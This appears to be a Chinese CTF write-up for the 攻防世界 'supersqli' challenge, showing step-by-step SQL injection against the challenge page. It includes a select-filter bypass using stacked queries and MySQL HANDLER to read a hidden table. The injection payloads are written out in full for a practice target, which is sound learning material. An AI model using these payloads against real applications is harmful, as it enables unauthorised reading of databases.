攻防世界supersqli SQL流程

作者：[局外人]

分类：[技术分析]

标签：CTF SHOW 刷题 新手

阅读时长：约 [2] 分钟

引言（前言）

日常CTF 做题记录，日常做题分享，希望能积累更多的知识！！！

攻防世界supersqli

1.1 题目及分析

<html>
<head><meta charset="UTF-8"><title>easy_sql</title>
</head>
<body>
<h1>取材于某次真实环境，只说一句话：开发和安全缺一不可</h1>
<!-- sqlmap是没有灵魂的 -->
<form method="get">姿势: <input type="text" name="inject" value="1"><input type="submit">
</form>
<pre>
</pre>
</body>
</html>

• 题目分析

• 此题主要是考察SQL相关流程和方法。

1.2 思路

• SQL的相关流程
• 1.判断类型是字符形还是数字型

• 通常判断是否是字符型

• 这里就在尾部加一个单引号来形成封闭的字符串查询?inject=1'

• 这样页面就会报错

• 如果是?inject=1'--+

• 这样页面就会正常,因为--+是用于注释后面的SQL语句

• 2.判断字段数，也就是这个表有几列

• ?inject=1'order by 1 --+这里从的1开始慢慢加，直到报错，就能知道有几列了

• 因为报错的时候，证明没有那一列

• 通常判断列数是为了有助于联合查询，但是这里有一个过滤。

• 3.查询

• ?inject=1'union select databases,2 --+

• return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

• 发现过滤了select,采用后续的语句逐步查看信息,直接在后面接;来连续运行SQL语句一般来说是不常见的，但是这里可以
• ?inject=1';show databases --+
• ?inject=1';use supersqli; show tables; --+
• ?inject=1';use supersqli;show columns from 1919810931114514; --+
• 这里可以利用handler命令来读取信息,相关规则在后面的表中
• playload?inject=1';use supersqli;handler `1919810931114514` open as p;handler p read first;--+,这里的数字需要用`包括起来，避免数据库被当成数字。

1.3 结果

大家多多尝试一下有没有更好的方法吧！

HANDLER命令的总结

以下是MySQL中HANDLER命令的总结，包含操作类型、语法、说明及示例：

互动环节

• 各位大佬们是否有更优的实现方式？欢迎分享代码
• 评论区聊聊吧～